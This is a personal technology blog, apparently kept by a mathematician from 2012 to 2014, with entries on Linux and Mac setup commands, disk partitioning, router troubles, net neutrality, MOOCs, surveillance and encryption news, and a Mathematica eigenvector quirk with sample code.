28-05-2014: With my own book library reaching 160 Gig of texts, reducing size is crucial. Its amazing how small the arxiv can compress the PDF's. See for example this marvelous book which is down to 11.8 Meg but still has stellar quality. When opening it under OS X with Preview removing a few pages and storing it again, the size explodes to over 100 times the original size. I tried to compress it again with Acrobat and its still 48.8 Meg, more than 4 times the original size. I can bring it down to 18 Meg with the "gs" commandline but the result is terrible as typical jpg artefacts can be seen. Having seen that the internet archive uses commercial software from LuraTech, I tried the LuraTech PDF Compressor Desktop). It installs and runs under wine in linux but refuses to finish the conversion. Having a high quality PDF compressor should be a high priority both under OS X and linux. Well, use djvu then! While I adore djvu, the djvu readers are unfortunately still bad and equiped with strange interfaces especially on tablets so that I prefer PDFs.
26-05-2014: Strange incident with truecrypt a safe and reliable software, I have used since many years. Could have been hacked, could have been forced to close doors or auditing might have found something. Mysterious.
22-05-2014: Installed Ubuntu 14.04 at home and office. Best ubuntu ever. Glad they focused on stability rather than features. The reason for upgrading was also prophylactic: I like to have a refresh the drive from time to time evenso one worries too much. But I'm fanatic about having an extremely responsive system and not have to sysadmin my machines during the semester. A screenshot of the screen right now. To make a mountable Ubuntu USB installation stick from the command line on a Mac air: "hdiutil convert -format UDRW -o ubuntu.img ubuntu-14.04-desktop-amd64.iso " and "diskutil unmountDisk /dev/disk1" and "sudo dd if=ubuntu.img.dmg of=/dev/rdisk1 bs=1m". Moved over all internal drives to 3T drives (now mainstream and under 100 dollars), while the operating system is still on the fastest available SSD. Copying over costs about 12 hours with rsync. Having / and /home on different drives has become trickier as Ubuntu now locks you out once an other drive without .Xauthority etc present in /home. One has first to sync over the newly built default user stuff to the other home folder on the harddrive and then edit /etc/fstab to mount it on /home.] Formatting 3TB harddrives does no more work with "fdisk" as the later only produces 2.2T file systems. "parted" builds now the partitions: in my case "parted /dev/sde", then enter "mklabel gpt" and "mkpart pri 1 -1" To build the ext4 filesystem, the command ``mkfs.ext4 /dev/sde1" still works. I would not buy the Western Digital "Intellipower" drives any more. They are definitly slower: "hdparm -t /dev/sdd1" Timing buffered disk reads: 504 MB in 3.01 seconds = 167.31 MB/sec "hdparm -t /dev/sdc" Timing buffered disk reads: 340 MB in 3.01 seconds = 113.10 MB/sec the speed factor is essentially the 7200/5400 RPM factor. For the backup drive, a green drive makes sense but not for the main harddrive.
19-05-2014: Cool Google Rubik Doodle.
13-05-2014: An interesting analogy of network neutrality and degeneration of California utilities in the 1990ies. Slowing down or reducing the service to force people to upgrade or pay more is a strategy, one sees also implemented in other places: our town of Arlington recently put the garbage and recycling business in the hands of the private company JRM. They often refuse to take things and put stickers on the usual trash (this is recyling), while the recyling truck does not pick it up. It is aggrevating. Similarly as with the internet, where packages are no more picked up and movies start to stutter.
09-05-2014: A strange networking problem at home drove me almost insane. Wireless connections to the laptops would sometimes work and sometimes not. Reconfiguring all networking, removing /Library/Preferences etc did not work. Changed and rechanged the ARP tables, DNS tables etc, Firewall settings etc. Nothing helped reliably. I reinstalled OSX: even there, it sometimes worked with the wireless, then no more. Like an evil switch would randomly switch on and off. Since TP-link routers had been compromized a while ago, I also investigated that but the new AC1750 TP-link router. But nobody had tempered with DNS server settings there and that router is safe. Finally, I wiped the harddrive clean, reinstalled Lion, then Maverick again and restored the old stuff (except configurations) from the time machine. Again, the same story. I brought a second identical macbook air and compared line by line all network settings, one would work the other not. Then the other would work etc. Finally, I looked again over the router. I had not seen that I had carelessly configured two wireless channels with the same SSID and password, where one was the guest network. What had happened was that every time the laptop got attached, it was either at the wireless network directly (allowing local networking) or at the guest network (not allowing local networking).
05-05-2014: Also google gets into the classroom. As usual with free services: how long will it take until it is shelved in a spring cleaning, how long will it stay free without advertisement? Are submitted work and grades kept private for ever or internally reused for other purposes in the future? As usual with technology, there are other concerns: for example that outsourcing technology destroys local IT culture and makes schools even more dependent on "big brothers".
26-04-2014: Net neutrality seems to end and send the web down the tubes.
31-03-2014: A heise article shows that iBeacon is used to track students or customers in shops. Article. The app: BeHere: "Using proximity, teachers can automatically identify which students are accessing the classroom, and easily manage help requests using an ordered line, always up-to-date". Simply terrible. It assumes everybody must have a smartphone with Bluetooth enabled.
29-02-2014: Articles like this ask whether Netflix is throttled by internet providers. The answer is a clear yes. Netflix has recently become unwatchable on Verizon FIOS. Netneutrality is already dead. Its no more a nightmare scenario. It is a nightmare already. By the way, the throttling effects not only netflix. When Comcast throttled my SSH traffic (which includes rsync) 5 years ago, I had switched. I consider dumping Verizon for everything, also phones now.
18-02-2014: Solentnews as an alternative to Slashdot resembles Slashdot 15 years ago. The question is whether it can succeed growing without needing to cash in. Currently, it looks great and has a good community, like Slashdot 15 years ago
14-02-2014: A lot has been written to the 30th anniversary of the mac. An article about Niklaus Wirth who introduced the Pascal,Modula,Oberon programming languages and the Lilith computer. I had seen the machine demonstrated when being a student. This was before the first Mac has appeared and was the first time, a mouse has appeared in a PC. The vertical screen looked perfect for programming. I loved Pascal because of its elegance but soon after, Wirth would introduce Modula, Modula2 and then Oberon. Wirth would make the languages more and more elegant, destroying backwards compatibility and convenience and rendered it so unpupular: no programmer wants to work with a programming language which has a half live time of 5-10 years.
13-02-2014: Shiny names are important in marketing. Since the "Semantic Web" hype promised about 10 years ago did not globally work (semantic services are easier to "game" and "cheat with" and require trust and were instead replaced by social peer mechanisms), NYT journalist John Markoff came up with the name Web 3.0. Also this is not new, and when Web 2.0 was flashy, already a few were talking about Web 3.0. Now there are already predictions about Web 4.0 as in this graph. What John Markoff called Semantic web is just refined artificial intelligence which exists already. The mistake which crystal ball readers make, is to assume that this is all new: the "holy grail" is already implemented to a large degree. Search engines are no more just directories and computer algebra systems are no more just calculators. With search engines, we can already get answers complex questions, similarly as computer algebra systems do. When a couple of students experimented with me on chat bots in education, this had been ridiculed, but already then, bots were roaming industries answering customer questions and gaming sites to make a buck. I saw already in 1998 a talented student building in a few hours a bot which would play poker online by reading and OCR the content from the screen and click to the right places. Now, bots swarm gaming places like War of Warcraft on mass. What the graph shows as Web 4.0 with intelligent personal agents has already been realized a long time ago. It will in in 2020 just have be even more important. There are other things, which the above graph gests wrong. Directory portals were much older than Web 2.0. Everybody who has used Gopher or usenet services knows that this had been there at the very beginning. Semantic search (taunted as part of Web 3.0) is long here. It has already become a nuisance as we live in Search bubbles: engines collect "context" in order to answer questions better. Depending on previous searches or reading habits or place, they assume they know what you want. This can be irritating. The semantic Web has become a nuisance. Instead, we want more of the persistent and open web, where information is stored in the open, with information which remains there and which is not hidden in opaque databases or services and moved around if a new look is smacked upon a website. Wikipedia is an example how it should be done: persistent links which are inteligable and can be referred to from other pages without having to rewire everything. What John Markoff in 2006 called an example of a question "I'm looking for a warm place to vacation and I have a budget of $3,000. Oh, and I have an 11-year-old child" can of course never be answered without context: the answer clearly depends on where one lives and what "warm" means and how much adventure one wants, this answer of can be answered already easily by knowing some basic geography as well as looking up some travel sites. Its all about marketing: "main frames with dumb terminals" (which existed before the PC) does not sound as nice as "the cloud with smart phones". The later reinvented the former. And "replacing humans with robots" is also not as good as a selling point than "building a semantic Web 3.0". But since predications in the future of technology have almost always been completely wrong, this might also be the case here.
08-02-2014: Flappy bird seems to go down after it has become a phenomenon. Its an old type of game but because it is so insanely hard, it had become famous. It reminded me of an old copter game, I had played on my old "Next station" already. I played flappy birds only briefly before getting frustrated. Achieving this was just the point of the game. The copy-cats will no more succeed because the novelty is gone: with flappy birds one could say: hey try this, "can you get more than 10 points" and have a good laugh. This is how the game became viral. The originality here was not the game type: it had many predecessors but the insanity of its difficulty made it unique. What makes a good game is difficult to say: chess, go, 15 puzzle, Rubic cube, monopoly are all from the ground off original and the 15 puzzle as originally designed was genious (switching two squares makes it impossible). Its maybe as with art. Oppenheim's art object "Dejeuner en fourrure" is genious. Knock-off's are often only Kitsch. The boundaries are difficult to put. The meat dress of Gaga for example is a knock-off from Jana Sterbak which I had seen myself once in an exhibit. Gaga made it something new by actually showing it off and not only as an exhibit or photograph.
07-02-2014: A comparison Slashdot beta with classic slashdot illustrates how an other news site driven by users is going to be ruined. It is a consequence that the site has been acquired by the career website dice. Nothing was learned from previous disasters. Slashdot tries to look now like Slate but has similar problems than most mobile versions of websites: the user is chained and slowed down by pictures and more advertisement and white space. The problem is that slashdot has moved into a news sector which is already heavily populated: most news websites have moderated and peer reviewed comment parts in the articles. Digg has peaked around 2007 and is now almost down to nothing. It has sold out the content to advertisers and crashed. Funny that digg looks now very similar than the new slashdot beta: a more coorporate look. Facebook and Youtube seem have peaked as they start to cash in and sell out and milk the audience with more and longer advertisement.
06-02-2014: A Register article discusses reliability issues with cloud services showing most services having outrages. It illustrates how IT centralization increases the risk of a global meltdown. Yes, prizes are going down, but probably only in order to kill competitions. Once everybody is hooked, the prizes can go up again. Having your data accessible by third parties is an other issue. But even more problematic is increased dependence on reliable broadband connections. This is already now almost in a monopoly state with poor service and lots of costs. We get a taste of the toxic mix already now: since everybody have their drop box accounts synced at Starbucks, the internet experience in such coffee houses is often that of the telephone Modem era. And just a month ago, an appeal court has killed net neutrality rules. A nightmare scenario is to have ISPs and Cloud services merge eventually, with ISPs giving preference to their own data.
20-01-2014: There had been a lot of discussion about interface questions for Windows and Ubuntu. There are two important points which make the paradigm change impossible: tablets are mainly one task devices: you run one application. This is good for consumption or single tasks like drawing something, but for most work it is not an option. Typically in any creative work, where several sources need to be considered, and different tools to be used, it is crucial to be able to customize multitasking. For scientific work for example, there is code to be run, literature data bases to be updated, texts written, information consulted etc. Also, in any operating system, it must be easy to access all the programs available from a menu. A doc like in OS X is sufficient. A second issue is psychological. The tiles distract from work. I like to go the computer and have tabula rasa, all documents, projects are at their places. I don't need them on the workplace. Its like coming to the office and having first to get rid of newspapers, TVs, piles of letters, reminders, books. For the tablet on the other hand, I like its reduced capabilities and one task at a time issue. I can use it to read a book, to surf the web, or sketch some ideas on a notepad (I use the tablets more and more as notebooks like paper, but strangly, it never worked for preparation notes for lectures, where paper is superior). I have myself been seduced twice to buy fancy keyboards for the ipad. Never used. Most of the time I "read" email on the ipad, but "answer" only when on a computer. Exceptions are urgent things on the road when reading on the phone. The decisions for such interface changes have clearly been strategic to have "one ring" to "bind them all".
24-12-2013: An upgrade to Ubuntu 13.10 with a fresh install onto new SSD led to sound, networking and dependency problems within half a day, I moved over to mint, which worked out of the box. Still use the blackbox windows manager and "xv" which uses still old libraries: "sudo ln -s libtiff.so.5.1.0 libtiff.so.4". The usb-creator-gtk had failed to create the bootable USB stick but "sudo dd if=~/linuxmint-16-cinnamon-dvd-64bit.iso of=/dev/sdg oflag=direct bs=1048576" worked. [update: mint MDM memory footprint is huge (I need the memory for mathematica), acrobat installation from Adobe failed, adding "deb http://archive.canonical.com/ quantal partner" in "/etc/apt/sources.list.d/additional-repositories.list" and "apt-get update","apt-get install acrobat" reproduced the "C:\nppdf32Log\debuglog.txt" bug seen in earlier ubuntus.]
23-12-2013: Will Adobe succeed with Cloud subscriptions? For me, it will never be an option because any "cloud solution" is a "chain solution" making you dependent. Having purchased the Adobe suits a couple of times in my life, this is the end. The gimp is better but has still many features missing like Warp and liquify tools. After customer backslash, competitors strive. On the mac, pixelmator has become much better. Having used it since the first version six years ago, the liquify tools getting real and 3.0 FX looks like a serious competitor for Adobe, especially since it is reasonably prized: less than one month of Adobe subscription and because the application starts up fast. Opening Adobe products started to feel like booting up a virtual machine.
20-12-2013: Winter office: producing grades.
18-12-2013: A pretty good account on the anonymous email scare last Monday. (It had been an interesting day).
11-12-2013: A NYT article about MOOCS mentions some statistics released by the Penn GSE Press room: no surprise at all. Only half who registered a actually ever viewed a lecture and only 4 percent completed the course. This is not new. When I was a kid, there were already MOOCS, but on TV. It was called "telecolleg" (an (example)) which came with a book and TV lectures. I myself took an electronics course in high school but also only did part of it and did not do the exam. I myself learned most about electronics by building and doing things, of course mostly according to a plan but also without. In an online experience it is difficult to keep the pressure going and to set time aside. An other problem to consider with MOOCS (as with telecolleg) is that courses race to the bottom and focus on trivialities in order not to lose students. But like telecolleg on TV, also MOOCS will not go away. Similarly than libraries or TV have not replaced the classroom, the web does not replace the lecture hall. But it can complement it. From page 20 on our article on 3D printing in education: "We witnessed 3 revolutions: "new math" brought more advanced mathematics to the classroom of the generation X. Calculators and new tools like the overhead projector or Xerox copying tools amplified these changes. 20 years later came the "math wars". It effected the generation Y and also contained both content and philosophy shifts as well as technological earthquakes like widespread use of computer algebra systems and the world wide web. Again 20 years later, now for the generation Z, we see social media and massive open online courses changing the education landscape. We have currently no idea yet, where this is going, but when looking back to the other revolutions, it is likely that the soup is again eaten colder than cooked: social media start to show their limitations and the drop out rates for MOOCs courses can be enormous. Revolutions are often closer to convolutions. Fortunately, future generations of teachers and students can just pick from a larger and larger menu and tools. What worked will survive. But some things have not changed over thousands of years: an example is a close student-teacher interaction. Its a bit like with Apollonian cones which were used by the Greeks already in the classroom. They still are around. What has changed is that they can now be printed fast and cheaply. For a student, creating and experimenting with a real model can make as big as an impression as the most fancy 3D visualization, seen with the latest virtual reality gaming gear. [ A slate article]
25- 10-2013: Until recently, it had been fun to look at youtube charts which had videos ranked according to popularity. Now it is gone. Why the manipulation? Maybe because of a You Tube Music Award? Recent screenshotss 1, 2 of charts with the most watched and shared videos on September 14, 2013. Youtube has now become closer to TV, where content is presented in a form which can be sold out. Did google not learn from disasters like Digg, where content manipulation has killed a once successful venture? I would prefer they would bring back the old youtube charts, driven by pure numbers. The current setup looks worse.
21-10-2013: Got the new OS X Maverick installed on a laptop and iMac. Runs smooth. Optically, only the new gray doc background for the doc bothers. In general, it would be nice to be able to customize more the look of the desktop. The new OS is more bitching about Cloud. Otherwise things are pretty the same and most applications run faster and smoother. I was eager to try Keynote 2013. The interface the software has radically changed. Almost nothing is the same. Fortunately, keynote never needed any manual and relearning how to do things took only minutes. After half an hour, it was clear that one needs to be careful when useing Keynote 2013 for old presentations. It can distort and damage, embedded movies need to be converted, the geometry of the slides, fonts, pictures etc can changed. The first presentation I tried, was completely ruined. The culprit was "optimizing for IOS" which virtually destroyed the geometry of the slides in an unrepairable way. New again: Keynote files are folders and not a compressed files. Two other small surprises: to use Mathematica, Java SE 6 needed to be installed and for running a command-line stuff like "convert", a reinstall of XQuartz was required. [ Update: October 27, 2013: Maverick without warning has changed display settings for external monitors. This needs to be checked before going into a lecture. I was stranded on Friday for a minute until the display worked. Battery life has decreased considerably, I believe. Also, there are still problems with updating icons on the desktop. One thing I miss a lot in the new keynote is the missing "magic alpha" wand and in general the very sparse menu bar. One has to dig several times to change basic things like color of font. Otherwise, the upgrade is not too bad.]
21-10-2013: Got as a birthday present an upgrade of the home network. The new ASUS RT-AC66U router uses 802.11ac reaching 1.75Gbps and makes wireless considerably faster. My newest Mac Air already uses 802.11ac, so that it already matters. Here is a review of the router and I can confirm that it is a nice piece of hardware and also small. How do they do the trick? It seems that it is in the multiple antennas. But also the ethernet home network has sped up considerably. The configuration interface is nice and I also attached a spare 1 TB hard drive for global media access (books and movies). One hick-up: my wireless printer does not work with WEP2 and I had to wire it with USB for now.
12-10-2013: It is the rate of change which matters, when looking at national debt.
12-10-2013: After a hard drive fail on an Imac, I replaced it with a 1 TB SSD drive. My first of this size. They are still a bit expensive (500 bucks), but worth it. The install on an older Imac is not too easy. I slightly damaged the cables attached to the monitor, when rewiring things. Since reinstalling the OS did not work with the recovery setup and my thunderbolt drives are not yet ready for that mac, I needed install OS X on my laptop to a external USB hard drive, then use that to install. Since the SSD has no temperature sensor, the fan of the Imac was always running on full speed. A HDD fancontrol App helped. And now, that old imac is a quiet and fast machine and delays from moving platters are gone.
21-9-2013: This message reminds of error messages of early windows versions. What happens if one clicks "Delete from Mac"? Apple really seems to want all your documents on the cloud.
19-9-2013: Both URL shortened links and QR codes have been abused so much that users do not trust them any more. This sums it up. Would anybody click on http://goo.gl/fnOVbZ or scan in a picture like that? Both correspond to licking a toilet seat. Its amazing how fast technology can be destroyed these days. URL shorteners are used by spammers to hide their bait and QR codes are used by rogue marketers or stock market pushers.
18-9-2013: Googles foucault pendulum animation (local copy) illustrates nice javascript technology which before was done in flash only. What I always liked about javascript is that one can see the source code.
17-9-2013: A recent factorization of RSA keys illustrates how important pseudo number generators are. From the paper: "It is clear that the random-number generator inside the chip hardware is frequently stuck in a short cycle." It recommends "We strongly recommend that the chip manufacturer publicly disclose full details of the RNG hardware in use and provide copies of the RNG hardware to researchers". See also this NYT article or a discussion here which points to an interesting story about elliptic curves.
06-9-2013: After new revelations about backoors in encryption standards, this should be a stronger push for open source products and stronger encryption algorithms based on mathematically difficult problems. Maybe one could fund a prestigious prize for finding deliberately planted backdoors in software or flaws in random number generators. And help humiliating anybody building or selling flawed software. Relying on mathematically difficult problems is probably the safest way to keep a privacy layer intact, and having such a layer is essential for banking or health care, diplomacy or business. It is unlikely that agencies like NSA or GCHQ have mathematical break-troughs before academia and if then only marginal breakthroughs (its illustrated in Levy's book "Crypto"). Schneider ends his article with "I trust in Mathematics" and backs it up with historical developments in cryptoanalysis. Yes, GCHQ has had the idea of Diffie-Hellman key exchange a few years before the idea popped up in academia, but it was close. Schneider mentions differential cryptoanalysis which was known by agencies before Biham and Shamir. But also there, it had been close. Schneider: "The NSA has a lot of people thinking about this problem full-time. According to the black budget summary, 35,000 people and 11 billion annually are part of the Department of Defense-wide Consolidated Cryptologic Program." Actually, this is important work, because as more think about these mathematical problems without cracking them as more secure they will become. It is likely that mathematics will prevail to win the internet back. To cite from page 137 in Levy's book: "The midseventies had already been traumatic for the NSA". Lets hope mathematics will render the third millenium a trauma for any snooping agency.
30-8-2013: Slashdot has a story about the latest MOOC in calculus. Nice that it is open source. Some of the problems are interactive example using Raphael Javascript vector library. Not everything works yet, like sound (which works on Chrome but not Mozilla). Its nicely done.
26-7-2013: The gimp image manipulation program constantly evolves. In general, it got better and better. One recent change from 2.6 to 2.8 drives me nuts: in order to make a simple change of a jpg file and resave it, one has now to go through about a couple of clicks. About 90 percent of the times, one just uses "gimp file.jpg", changes something like cropping, rescaling or changing brightness, then resave it. Now, one has to chose "overwrite" or "export" and reaffirm that one does not want to save it in gimp native form. There is a thread about it on the Gimp forum. Reactions like "then you should be using simpler software" is exactly the kind of arrogance which has killed many open source projects.
01-7-2013: My office desk:
08-6-2013: The tapping scandals have not produced a lot of outrage. We all "knew". But it is bad for business. One can cite: "That is the atomic and subatomic and galactic structure of things today. And you have meddled with the primal forces of nature." Why is it bad for business? Because it undermines trust. Any business needs to keep some information private in order to stay competitive. And nobody in his right mind will do business with companies which might leak out information. If it is given out to government, it also can reach the competition. Until this mess is solved by congress, customers will avoid US businesses with their data. [Update: November 3, 2013: The damage for Silicon valley is estimated to be 35-180 billion dollars.
12-6-2013: Follow up: the Prism scandal makes a lot of headlines abroad. It is a PR desaster for US companies. Why is it bad that data are in principle readable by third parties? For smaller companies, it means that the competition can catch on faster than expected. For individuals it means that medical records or communications with doctors could lead to workplace discriminations, that financial data and stock markets are more easy to be manipulated from individuals who have access to insider data like telephone records between CEOs or board members. It means espinonage becomes simpler. It also means that political assassination or extortion is easier and diplomacy becomes more difficult. Wikileaks should have taught a lesson: there are some conversations in diplomacy which are better not public. If a government lowers the standards for privacy, it has not to be surprised when sensitive information like information hacking of other governments gets public too. If a government lowers the standards about torture, its own forces risk being tortured.]
20-5-2013: A new workstation from thinkmate: intel Z77 Chipset, VSX R4 320, Intel i7-3770 3.4 GHZ, 4x8 GB PC3-12800 DDR3,60 Gig Intel 520 SSD for OS, 2x2TB SATA for data and backup, NVIDIA GeForce GT610, Gorgeous, quiet, beautifully built, well accessible and fast. The 32 gig memory definitely helps with larger Mathematica jobs (Mathematica 9 gobbles up even more memory than Mathematica 8 and I had more frequent crashes). Was time for a new 27 inch screen; while I run with 1920x1200 (WUXGA) on the home linux box, the iMac with 2560x1440 (WQHD) made me hungry for larger screen estate and I got also a WQHD size screen now in the office. Vendors have finally "got it" that screens like SXGA (1280x1024) make productive work hard. The later means like having books and articles open for reference, to have a computer algebra system working and some terminals with code and text editors. All at the same time. The XGA has become the new VGA (wow, the later was cute). Back to hardware: here are pics: Pic 1, Pic2 after opening the box. One linux issue (unrelated to the hardware) came up when setting things up: while I knew that the permissions of the .ssh directory are crucial, I had by accident my home directory with a 755 permission and "password free login" did not work. So, not only the .ssh directory, but also the /home/user directory has to have the right permission (like 700). Only noticed after turning on debug mode in sshd.config.
14-5-2013: Amazing how much space Windows 7 can gobble up in a short time. Made a fresh install on an older macbook air using boot-camp and had initially assigned 15 gig. After trying out some scanning software for the Kinect, the assigned windows partition was already full. Needed to repartition. The program Coriolis Systems worked perfectly and fast! The program includes also a tool to build a temporary system on a memory stick in order to do the resizing of the boot hard drive. One caveat: my memory stick had 32 gig only and reassigning 30 gig for the Windows partition did not work because the memory stick was not big enough. I had to reduce to 25 gig. That worked. By the way, the mac book air makes a gorgeous windows machine. Nicer than anything else seen lying around in the shops. In comparison, all these windows laptops are either crap or heavy or have miserable screens. To try out the 3D scanning software, I got a Windows 7 OEM licence because for some reason, the Harvard Licences did not work. The Artec Scanner can scan objects with a frame rate of 10 FPS. I was surprised and had expected that a heavy gaming machine with a decent GPU would be needed, to achieve that.
11-5-2013: Encrypted Media seems like a waste time because if a movie is visible on a computer screen, it can be captured. But then, in the long term, the tendency could be to close down on computer architectures (tablets and UEFI are a start), where the user is no more in charge of the hardware. Similar as in cars, where it is now almost impossible for the customer to do repair things beside basic things like alternator, spark plugs or batteries or timing belts. On the other hand, one will hardly be able to close computer architecture completely. Projects like Arduino or products like Raspberry Pi, together with Linux and open source software will most likely always be a way to backup media, even if the encryption is unbreakable. And then, there is the analog hole: even a totalitarian law forbidding free computer hardware can not prevent content to be captured in high definition from the screen with a high definition camera where with a decent setup, the quality can come close to the original digital format. One has to suspect therefore that the WWW consortium follows DRM Media implementations only because it helps to kill Flash and Silverlight faster. But they are almost dead anyway. Real player died so fast, that one could hardly blink. Silverlight is done as soon as netflix has switched and even Adobe does not believe in flash anymore.
03-5-2013: Amazing. Unreal Engine in Javascript and WebGL.
03-5-2013: The register has a story about Video pushed by Javascript. Have to see this first. Did not find it yet at otoy.
02-5-2013: The very first page on the web is remarkably modern and clear. No second guessing needed to navigate. Of course, there is not much content yet, lots of gopher links, no pictures, movies and interaction. Webforms (example) were ASCII based and sent by email. happy 20th anniversary of webtechnology.
01-5-2013: After having used Mathematica 9 now for a while, there are a surprisingly little changes. I had to adapt names in my old programs like "Prism" or "RandomFunction" which had not been in Mathematica 8 which need to be renamed. Mathematica 9 also grabs more memory in general than predecessors, leading to earlier crashes, especially with the frontend. All reasons to avoid the front end as much as possible and have a reason to upgrade macbook air.
31-4-2013: Open book on low cost 3D printing. There is also a contribution of Liz and myself inside. Thinking like a 3D printer has advantages also when visualizing mathematics without the printer. The graphics get nicer. example.
30-4-2013: A Spiegel article mentions an amazing visualization of Pi as a random walk. This is a place where flash still shines and is unmatched with any other technology.
27-4-2013: The Spiegel has an interview with Wolfram about the new Facebook features in Wolfram Alpha. I have see the demonstration, Steven Wolfram gave at Harvard 2 weeks ago and it was impressive how fast the graph algorithms worked interactively. Working on some graph geometry myself, I know that with larger graphs, things can get slow.
24-4-2013: Just got the social media guide from the Harvard summer school. Just common sense advise. Here is a social media survival guide at the Harvard business review.
11-4-2013: A nice short article explaining H.265. Key idea is a smarter picture sub-division system. Some smartphones support it already.
22-3-2013: Working on a zeta graph confirmed that most of computing work is spent working around limitations of programs or languages. Instead of figuring out all angles and tweaks of a built in routine in a complex program, it is often faster to build the routine from scratch if certain conditions and limitations need to be satisfied. Generic routines need to work in very general situations and can therefore not be optimal in specific circumstances.
16-3-2013: Its amazing how somebody managed to use the spammers embedded pixel trick for setting up a business. I'm surprised that this actually works, since it has always been considered smarter to let email client not open images by default.
15-3-2013: From a NYT sunday review an interesting observation: ""The concepts of work and play have become farcically reversed: schoolwork is meant to be superfun; play, like homework, is meant to teach."
9-3-2013: An upgrade of Verizon FIOS to a faster speed gave a good speed test
8-3-2013: Here is a list of what I would currently look at as the ten biggest sins of web content:
  1. rigidity: in geometry and format, assume tablet or force app
  2. curiosity: sniff user agents, IPaddress, cookies and personalize content
  3. fragmentation: split pages into many subsections to get more page counts
  4. complexity: javascript for video, flash for pictures or navigation
  5. cleverness: need user manual or have adventure skills to access content
  6. appearance: content should always come before "how it looks"
  7. greediness: tiny pictures only, streaming video, too many adds
  8. volatile: content is removed or relocated or uses horrid URLS
  9. obfuscation: iframes with hidden URLs, long URLs, individualized URLs
  10. walled off: access only through registration, walled off content
29-2-2013: Math in movies is now converted to HTML 5 video. Since Adobe decided last year to end support Linux in new versions, Flash will pretty soon be no option for me anymore. Conversion to HTML5 is annoying for two reasons. First: transcoding the movies is slow, buggy, degrades quality if files need to stay small. When converting to theora or webm, there can be hick-ups; files getting too large, lacking sound or getting out of sync. Sometimes, proprietary conversion software is needed. Second: storage space and backup space get multiplied because formats theora, webm, h264, and flash versions are needed to reach everybody. This means doubling the size at least, even if the site already had flash and quicktime. What would be nice is a standalone unix application (not depending on any libraries nor version of linux) which takes any movie format and spit out all 4 formats .flr,.mp4,.webm,.ogg in an optimized way. I have a script, but it is neither optimized, nor reliable and also too library dependent.
19-2-2013: Copernicus on google. The javascript is a bit confuscated. I have been a big fan of javascript in 2000 an example with Chaikin interpolation. The problem of Javascript today is that it is for optimisation reasons written in a way which is hard to parse. I did not rewrite the copernicus animation as for the Apple but it would take less time than to understand what the code does.
13-2-2013: Something to make LaTeX more popular. For me, an other reason to use latex is to use the editor I use for everything else. A "cloud" solution would therefore never cut it. The examples are well chosen.
20-1-2013: A refreshing article on typography. I'm not sure about the adaptive layout. It can break more easily if done wrong and is a cage which gives the reader less control. It is of course more and more the trend. For a simple page like the one mentioned above, it works well.
17-1-2013: Try out Atlas, a differential geometry package for Mathematica. Its quite nicely done. Having programmed most of the basic stuff myself already in Mathematica like connections, curvatures, especially for this project, it can be handy compare results.
8-1-2013: While installing a windows 7 virtual machine in ubuntu, the question popped up: why does the program itself now come in different flavors? "qemu" would suffice as it was before. The program could figure out whether it is a 64 bit system by quickly checking uname -m. Its a small matter, but having to use new names like "qemu-system-x84_64" breaks all tutorials. When virtualized, Windows 7 needs at least 9 gig of HD space and also enough memory. 12 Gig and 512 Meg Ram worked when installing it on a 64 bit ubuntu system:
qemu-img create win7.img 12G
qemu-system-x86_64 -hda win7.img -cdrom Win7_64_EN_DVD.iso -m 512
28-12-2012: Here is a Mathematica inconsistency which almost drove me insane when computing with Dirac matrices. I only could solve it with the help of Newton. It is a basic computation flaw for in the Eigenvector routine, which does not appear for generic matrices. One would expect that the Eigenvalues and Eigenvectors match. They often do and actually do also when the matrix is integer valued. With the same "real entries" however, the behavior is different. Here is a simple example: the matrices A0,A1 are the same except that A1 consists of floating point numbers.
 A0={{0, 0, 0, 0, 0, -1, 0, 0, 0, 1}, 
{0, 0, 0, 0, 0, 1, -1, 0, 0, 0},
{0, 0, 0, 0, 0, 0, 1, -1, 0, 0},
{0, 0, 0, 0, 0, 0, 0, 1, -1, 0},
{0, 0, 0, 0, 0, 0, 0, 0, 1, -1},
{-1, 1, 0, 0, 0, 0, 0, 0, 0, 0},
{0, -1, 1, 0, 0, 0, 0, 0, 0, 0},
{0, 0, -1, 1, 0, 0, 0, 0, 0, 0},
{0, 0, 0, -1, 1, 0, 0, 0, 0, 0},
{1, 0, 0, 0, -1, 0, 0, 0, 0, 0}};
A1={{0., 0., 0., 0., 0., -1., 0., 0., 0., 1.},
{0., 0., 0., 0., 0., 1., -1., 0., 0., 0.},
{0., 0., 0., 0., 0., 0., 1., -1., 0., 0.},
{0., 0., 0., 0., 0., 0., 0., 1., -1., 0.},
{0., 0., 0., 0., 0., 0., 0., 0., 1., -1.},
{-1., 1., 0., 0., 0., 0., 0., 0., 0., 0.},
{0., -1., 1., 0., 0., 0., 0., 0., 0., 0.},
{0., 0., -1., 1., 0., 0., 0., 0., 0., 0.},
{0., 0., 0., -1., 1., 0., 0., 0., 0., 0.},
{1., 0., 0., 0., -1., 0., 0., 0., 0., 0.}};
G0=Eigenvectors[A0]; n0=Length[A0]; l0=Eigenvalues[A0]
G1=Eigenvectors[A1]; n1=Length[A1]; l1=Eigenvalues[A1]
Chop[Table[Max[N[Abs[A0.G0[[k]]-l0[[k]] G0[[k]]]]],{k,n0}]]
Chop[Table[Max[N[Abs[A1.G1[[k]]-l1[[k]] G1[[k]]]]],{k,n1}]]
A remedy is to avoid the "Eigenvector" routine entirely and using "Eigensystem", where the inconsistent behavior is absent. In other words, use "Eigensystem[A][[2]]" instead of Eigenvectors[A].
 {l0,G0}=Eigensystem[A0]; {l1,G1}=Eigensystem[A1]; 
Chop[Table[Max[N[Abs[A0.G0[[k]]-l0[[k]] G0[[k]]]]],{k,n0}]]
Chop[Table[Max[N[Abs[A1.G1[[k]]-l1[[k]] G1[[k]]]]],{k,n1}]]
Strictly speaking, the behavior is not a bug because the routine "Eigenvector" does not claim to list the eigenvectors in the same order than "Eigenvalues". But it is cruel for the user (and I lost at least a day of work and almost my bearings finding this because I expected the error to be in my own programs). The order mismatch is rare. It appeared here because Dirac matrices have lots of symmetry. By the way, the matrix A0 is the square root of a doubled Laplacian. I had dealt with such Laplacians in my thesis already, where it was shown that every Jacobi matrix can be factored L=D2+c with an other Jacobi matrix D. Iterating the construction led to almost periodic operators with spectra on the Julia set of the complex map f(z) = z2+c.
24-08-2012: A survey on technology in higher education.
11-06-2012: I could see a demo and then try it out myself: the Microsoft surface at Cabot library. It is unbelievable that this screen only has a 1920x1080 pixel resolution! Additionally, the system is very closed. One can only access Bing image and maps and built in documents and there is even no webbrowser. Compare the resolution with the latest Mac book pro announced today with 2880-1800 resolution. The screen resolution of PC laptops and monitors (like 1920x1080) becomes more and more questionable. One has a hard time to find a decent high resolution monitor which does not break the wallet).
